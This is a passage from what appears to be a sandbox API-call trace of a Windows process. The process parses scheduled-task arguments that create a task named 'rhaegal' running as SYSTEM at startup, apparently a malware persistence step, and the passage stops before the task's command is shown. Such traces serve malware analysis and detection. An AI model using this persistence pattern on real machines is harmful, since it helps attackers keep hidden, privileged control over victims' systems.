_Size=0x7) returned 0 [0017.873] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|delete|") returned 8 [0017.873] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.873] lstrlenW (lpString="|delete|") returned 8 [0017.873] lstrlenW (lpString="|RU|") returned 4 [0017.873] StrStrIW (lpFirst="|delete|", lpSrch="|RU|") returned 0x0 [0017.873] SetLastError (dwErrCode=0x490) [0017.873] lstrlenW (lpString="query") returned 5 [0017.873] lstrlenW (lpString="query") returned 5 [0017.873] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] lstrlenW (lpString="RU") returned 2 [0017.873] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|query|") returned 7 [0017.873] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.873] lstrlenW (lpString="|query|") returned 7 [0017.873] lstrlenW (lpString="|RU|") returned 4 [0017.873] StrStrIW (lpFirst="|query|", lpSrch="|RU|") returned 0x0 [0017.873] SetLastError (dwErrCode=0x490) [0017.873] lstrlenW (lpString="change") returned 6 [0017.873] lstrlenW (lpString="change") returned 6 [0017.873] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] lstrlenW (lpString="RU") returned 2 [0017.873] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|change|") returned 8 [0017.873] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.873] lstrlenW (lpString="|change|") returned 8 [0017.873] lstrlenW (lpString="|RU|") returned 4 [0017.873] StrStrIW (lpFirst="|change|", lpSrch="|RU|") returned 0x0 [0017.873] SetLastError (dwErrCode=0x490) [0017.873] lstrlenW (lpString="run") returned 3 [0017.873] lstrlenW (lpString="run") returned 3 [0017.873] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] lstrlenW (lpString="RU") returned 2 [0017.873] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|run|") returned 5 [0017.873] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.873] lstrlenW (lpString="|run|") returned 5 [0017.873] lstrlenW (lpString="|RU|") returned 4 [0017.873] StrStrIW (lpFirst="|run|", lpSrch="|RU|") returned 0x0 [0017.873] SetLastError (dwErrCode=0x490) [0017.873] lstrlenW (lpString="end") returned 3 [0017.873] lstrlenW (lpString="end") returned 3 [0017.873] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] lstrlenW (lpString="RU") returned 2 [0017.873] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|end|") returned 5 [0017.873] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.873] lstrlenW (lpString="|end|") returned 5 [0017.873] lstrlenW (lpString="|RU|") returned 4 [0017.873] StrStrIW (lpFirst="|end|", lpSrch="|RU|") returned 0x0 [0017.873] SetLastError (dwErrCode=0x490) [0017.874] lstrlenW (lpString="showsid") returned 7 [0017.874] lstrlenW (lpString="showsid") returned 7 [0017.874] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.874] lstrlenW (lpString="RU") returned 2 [0017.874] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.874] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|showsid|") returned 9 [0017.874] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.874] lstrlenW (lpString="|showsid|") returned 9 [0017.874] lstrlenW (lpString="|RU|") returned 4 [0017.874] StrStrIW (lpFirst="|showsid|", lpSrch="|RU|") returned 0x0 [0017.874] SetLastError (dwErrCode=0x490) [0017.874] SetLastError (dwErrCode=0x490) [0017.874] SetLastError (dwErrCode=0x0) [0017.874] lstrlenW (lpString="/RU") returned 3 [0017.874] StrChrIW (lpStart="/RU", wMatch=0x3a) returned 0x0 [0017.874] SetLastError (dwErrCode=0x490) [0017.874] SetLastError (dwErrCode=0x0) [0017.874] lstrlenW (lpString="/RU") returned 3 [0017.874] SetLastError (dwErrCode=0x0) [0017.874] SetLastError (dwErrCode=0x0) [0017.874] lstrlenW (lpString="SYSTEM") returned 6 [0017.874] lstrlenW (lpString="-/") returned 2 [0017.874] StrChrIW (lpStart="-/", wMatch=0x53) returned 0x0 [0017.874] SetLastError (dwErrCode=0x490) [0017.874] SetLastError (dwErrCode=0x490) [0017.874] SetLastError (dwErrCode=0x0) [0017.874] lstrlenW (lpString="SYSTEM") returned 6 [0017.874] StrChrIW (lpStart="SYSTEM", wMatch=0x3a) returned 0x0 [0017.874] SetLastError (dwErrCode=0x490) [0017.874] SetLastError (dwErrCode=0x0) [0017.874] lstrlenW (lpString="SYSTEM") returned 6 [0017.874] SetLastError (dwErrCode=0x0) [0017.874] SetLastError (dwErrCode=0x0) [0017.874] lstrlenW (lpString="/SC") returned 3 [0017.874] lstrlenW (lpString="-/") returned 2 [0017.874] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.874] lstrlenW (lpString="?") returned 1 [0017.874] lstrlenW (lpString="?") returned 1 [0017.874] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.874] lstrlenW (lpString="SC") returned 2 [0017.874] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.874] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|?|") returned 3 [0017.874] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.874] lstrlenW (lpString="|?|") returned 3 [0017.874] lstrlenW (lpString="|SC|") returned 4 [0017.874] SetLastError (dwErrCode=0x490) [0017.874] lstrlenW (lpString="create") returned 6 [0017.874] lstrlenW (lpString="create") returned 6 [0017.874] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] lstrlenW (lpString="SC") returned 2 [0017.875] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|create|") returned 8 [0017.875] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.875] lstrlenW (lpString="|create|") returned 8 [0017.875] lstrlenW (lpString="|SC|") returned 4 [0017.875] StrStrIW (lpFirst="|create|", lpSrch="|SC|") returned 0x0 [0017.875] SetLastError (dwErrCode=0x490) [0017.875] lstrlenW (lpString="delete") returned 6 [0017.875] lstrlenW (lpString="delete") returned 6 [0017.875] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] lstrlenW (lpString="SC") returned 2 [0017.875] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|delete|") returned 8 [0017.875] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.875] lstrlenW (lpString="|delete|") returned 8 [0017.875] lstrlenW (lpString="|SC|") returned 4 [0017.875] StrStrIW (lpFirst="|delete|", lpSrch="|SC|") returned 0x0 [0017.875] SetLastError (dwErrCode=0x490) [0017.875] lstrlenW (lpString="query") returned 5 [0017.875] lstrlenW (lpString="query") returned 5 [0017.875] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] lstrlenW (lpString="SC") returned 2 [0017.875] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|query|") returned 7 [0017.875] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.875] lstrlenW (lpString="|query|") returned 7 [0017.875] lstrlenW (lpString="|SC|") returned 4 [0017.875] StrStrIW (lpFirst="|query|", lpSrch="|SC|") returned 0x0 [0017.875] SetLastError (dwErrCode=0x490) [0017.875] lstrlenW (lpString="change") returned 6 [0017.875] lstrlenW (lpString="change") returned 6 [0017.875] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] lstrlenW (lpString="SC") returned 2 [0017.875] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|change|") returned 8 [0017.875] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.875] lstrlenW (lpString="|change|") returned 8 [0017.875] lstrlenW (lpString="|SC|") returned 4 [0017.875] StrStrIW (lpFirst="|change|", lpSrch="|SC|") returned 0x0 [0017.875] SetLastError (dwErrCode=0x490) [0017.875] lstrlenW (lpString="run") returned 3 [0017.875] lstrlenW (lpString="run") returned 3 [0017.875] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] lstrlenW (lpString="SC") returned 2 [0017.875] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.875] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|run|") returned 5 [0017.875] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.875] lstrlenW (lpString="|run|") returned 5 [0017.875] lstrlenW (lpString="|SC|") returned 4 [0017.875] StrStrIW (lpFirst="|run|", lpSrch="|SC|") returned 0x0 [0017.875] SetLastError (dwErrCode=0x490) [0017.875] lstrlenW (lpString="end") returned 3 [0017.875] lstrlenW (lpString="end") returned 3 [0017.875] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.876] lstrlenW (lpString="SC") returned 2 [0017.876] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.876] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|end|") returned 5 [0017.876] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.876] lstrlenW (lpString="|end|") returned 5 [0017.876] lstrlenW (lpString="|SC|") returned 4 [0017.876] StrStrIW (lpFirst="|end|", lpSrch="|SC|") returned 0x0 [0017.876] SetLastError (dwErrCode=0x490) [0017.876] lstrlenW (lpString="showsid") returned 7 [0017.876] lstrlenW (lpString="showsid") returned 7 [0017.876] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.876] lstrlenW (lpString="SC") returned 2 [0017.876] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.876] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|showsid|") returned 9 [0017.876] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|SC|") returned 4 [0017.876] lstrlenW (lpString="|showsid|") returned 9 [0017.876] lstrlenW (lpString="|SC|") returned 4 [0017.876] StrStrIW (lpFirst="|showsid|", lpSrch="|SC|") returned 0x0 [0017.876] SetLastError (dwErrCode=0x490) [0017.876] SetLastError (dwErrCode=0x490) [0017.876] SetLastError (dwErrCode=0x0) [0017.876] lstrlenW (lpString="/SC") returned 3 [0017.876] StrChrIW (lpStart="/SC", wMatch=0x3a) returned 0x0 [0017.876] SetLastError (dwErrCode=0x490) [0017.876] SetLastError (dwErrCode=0x0) [0017.876] lstrlenW (lpString="/SC") returned 3 [0017.876] SetLastError (dwErrCode=0x0) [0017.876] SetLastError (dwErrCode=0x0) [0017.876] lstrlenW (lpString="ONSTART") returned 7 [0017.876] lstrlenW (lpString="-/") returned 2 [0017.876] StrChrIW (lpStart="-/", wMatch=0x4f) returned 0x0 [0017.876] SetLastError (dwErrCode=0x490) [0017.876] SetLastError (dwErrCode=0x490) [0017.876] SetLastError (dwErrCode=0x0) [0017.876] lstrlenW (lpString="ONSTART") returned 7 [0017.876] StrChrIW (lpStart="ONSTART", wMatch=0x3a) returned 0x0 [0017.876] SetLastError (dwErrCode=0x490) [0017.876] SetLastError (dwErrCode=0x0) [0017.876] lstrlenW (lpString="ONSTART") returned 7 [0017.876] SetLastError (dwErrCode=0x0) [0017.876] SetLastError (dwErrCode=0x0) [0017.876] lstrlenW (lpString="/TN") returned 3 [0017.876] lstrlenW (lpString="-/") returned 2 [0017.876] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.876] lstrlenW (lpString="?") returned 1 [0017.876] lstrlenW (lpString="?") returned 1 [0017.876] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.876] lstrlenW (lpString="TN") returned 2 [0017.876] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.876] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|?|") returned 3 [0017.877] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.877] lstrlenW (lpString="|?|") returned 3 [0017.877] lstrlenW (lpString="|TN|") returned 4 [0017.877] SetLastError (dwErrCode=0x490) [0017.877] lstrlenW (lpString="create") returned 6 [0017.877] lstrlenW (lpString="create") returned 6 [0017.877] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] lstrlenW (lpString="TN") returned 2 [0017.877] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|create|") returned 8 [0017.877] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.877] lstrlenW (lpString="|create|") returned 8 [0017.877] lstrlenW (lpString="|TN|") returned 4 [0017.877] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0017.877] SetLastError (dwErrCode=0x490) [0017.877] lstrlenW (lpString="delete") returned 6 [0017.877] lstrlenW (lpString="delete") returned 6 [0017.877] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] lstrlenW (lpString="TN") returned 2 [0017.877] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|delete|") returned 8 [0017.877] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.877] lstrlenW (lpString="|delete|") returned 8 [0017.877] lstrlenW (lpString="|TN|") returned 4 [0017.877] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0017.877] SetLastError (dwErrCode=0x490) [0017.877] lstrlenW (lpString="query") returned 5 [0017.877] lstrlenW (lpString="query") returned 5 [0017.877] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] lstrlenW (lpString="TN") returned 2 [0017.877] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|query|") returned 7 [0017.877] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.877] lstrlenW (lpString="|query|") returned 7 [0017.877] lstrlenW (lpString="|TN|") returned 4 [0017.877] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0017.877] SetLastError (dwErrCode=0x490) [0017.877] lstrlenW (lpString="change") returned 6 [0017.877] lstrlenW (lpString="change") returned 6 [0017.877] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] lstrlenW (lpString="TN") returned 2 [0017.877] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.877] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|change|") returned 8 [0017.877] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.877] lstrlenW (lpString="|change|") returned 8 [0017.877] lstrlenW (lpString="|TN|") returned 4 [0017.878] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0017.878] SetLastError (dwErrCode=0x490) [0017.878] lstrlenW (lpString="run") returned 3 [0017.878] lstrlenW (lpString="run") returned 3 [0017.878] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.878] lstrlenW (lpString="TN") returned 2 [0017.878] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.878] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|run|") returned 5 [0017.878] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.878] lstrlenW (lpString="|run|") returned 5 [0017.878] lstrlenW (lpString="|TN|") returned 4 [0017.878] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0017.878] SetLastError (dwErrCode=0x490) [0017.878] lstrlenW (lpString="end") returned 3 [0017.878] lstrlenW (lpString="end") returned 3 [0017.878] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.878] lstrlenW (lpString="TN") returned 2 [0017.878] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.878] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|end|") returned 5 [0017.878] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.878] lstrlenW (lpString="|end|") returned 5 [0017.878] lstrlenW (lpString="|TN|") returned 4 [0017.878] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0017.878] SetLastError (dwErrCode=0x490) [0017.878] lstrlenW (lpString="showsid") returned 7 [0017.878] lstrlenW (lpString="showsid") returned 7 [0017.878] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.878] lstrlenW (lpString="TN") returned 2 [0017.878] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.878] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0xa, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|showsid|") returned 9 [0017.878] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TN|") returned 4 [0017.878] lstrlenW (lpString="|showsid|") returned 9 [0017.878] lstrlenW (lpString="|TN|") returned 4 [0017.878] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0017.878] SetLastError (dwErrCode=0x490) [0017.878] SetLastError (dwErrCode=0x490) [0017.878] SetLastError (dwErrCode=0x0) [0017.878] lstrlenW (lpString="/TN") returned 3 [0017.878] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0017.878] SetLastError (dwErrCode=0x490) [0017.878] SetLastError (dwErrCode=0x0) [0017.878] lstrlenW (lpString="/TN") returned 3 [0017.878] SetLastError (dwErrCode=0x0) [0017.878] SetLastError (dwErrCode=0x0) [0017.878] lstrlenW (lpString="rhaegal") returned 7 [0017.878] lstrlenW (lpString="-/") returned 2 [0017.878] StrChrIW (lpStart="-/", wMatch=0x72) returned 0x0 [0017.878] SetLastError (dwErrCode=0x490) [0017.878] SetLastError (dwErrCode=0x490) [0017.878] SetLastError (dwErrCode=0x0) [0017.878] lstrlenW (lpString="rhaegal") returned 7 [0017.879] StrChrIW (lpStart="rhaegal", wMatch=0x3a) returned 0x0 [0017.879] SetLastError (dwErrCode=0x490) [0017.879] SetLastError (dwErrCode=0x0) [0017.879] lstrlenW (lpString="rhaegal") returned 7 [0017.879] SetLastError (dwErrCode=0x0) [0017.879] SetLastError (dwErrCode=0x0) [0017.879] lstrlenW (lpString="/TR") returned 3 [0017.879] lstrlenW (lpString="-/") returned 2 [0017.879] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.879] lstrlenW (lpString="?") returned 1 [0017.879] lstrlenW (lpString="?") returned 1 [0017.879] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] lstrlenW (lpString="TR") returned 2 [0017.879] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|?|") returned 3 [0017.879] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.879] lstrlenW (lpString="|?|") returned 3 [0017.879] lstrlenW (lpString="|TR|") returned 4 [0017.879] SetLastError (dwErrCode=0x490) [0017.879] lstrlenW (lpString="create") returned 6 [0017.879] lstrlenW (lpString="create") returned 6 [0017.879] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] lstrlenW (lpString="TR") returned 2 [0017.879] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|create|") returned 8 [0017.879] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.879] lstrlenW (lpString="|create|") returned 8 [0017.879] lstrlenW (lpString="|TR|") returned 4 [0017.879] StrStrIW (lpFirst="|create|", lpSrch="|TR|") returned 0x0 [0017.879] SetLastError (dwErrCode=0x490) [0017.879] lstrlenW (lpString="delete") returned 6 [0017.879] lstrlenW (lpString="delete") returned 6 [0017.879] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] lstrlenW (lpString="TR") returned 2 [0017.879] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|delete|") returned 8 [0017.879] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.879] lstrlenW (lpString="|delete|") returned 8 [0017.879] lstrlenW (lpString="|TR|") returned 4 [0017.879] StrStrIW (lpFirst="|delete|", lpSrch="|TR|") returned 0x0 [0017.879] SetLastError (dwErrCode=0x490) [0017.879] lstrlenW (lpString="query") returned 5 [0017.879] lstrlenW (lpString="query") returned 5 [0017.879] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] lstrlenW (lpString="TR") returned 2 [0017.879] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.879] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|query|") returned 7 [0017.879] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.879] lstrlenW (lpString="|query|") returned 7 [0017.879] lstrlenW (lpString="|TR|") returned 4 [0017.879] StrStrIW (lpFirst="|query|", lpSrch="|TR|") returned 0x0 [0017.880] SetLastError (dwErrCode=0x490) [0017.880] lstrlenW (lpString="change") returned 6 [0017.880] lstrlenW (lpString="change") returned 6 [0017.880] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] lstrlenW (lpString="TR") returned 2 [0017.880] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|change|") returned 8 [0017.880] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.880] lstrlenW (lpString="|change|") returned 8 [0017.880] lstrlenW (lpString="|TR|") returned 4 [0017.880] StrStrIW (lpFirst="|change|", lpSrch="|TR|") returned 0x0 [0017.880] SetLastError (dwErrCode=0x490) [0017.880] lstrlenW (lpString="run") returned 3 [0017.880] lstrlenW (lpString="run") returned 3 [0017.880] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] lstrlenW (lpString="TR") returned 2 [0017.880] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|run|") returned 5 [0017.880] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.880] lstrlenW (lpString="|run|") returned 5 [0017.880] lstrlenW (lpString="|TR|") returned 4 [0017.880] StrStrIW (lpFirst="|run|", lpSrch="|TR|") returned 0x0 [0017.880] SetLastError (dwErrCode=0x490) [0017.880] lstrlenW (lpString="end") returned 3 [0017.880] lstrlenW (lpString="end") returned 3 [0017.880] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] lstrlenW (lpString="TR") returned 2 [0017.880] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.880] _vsnwprintf (in: _Buffer=0x5b54d0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|end|") returned 5 [0017.880] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|TR|") returned 4 [0017.880] lstrlenW 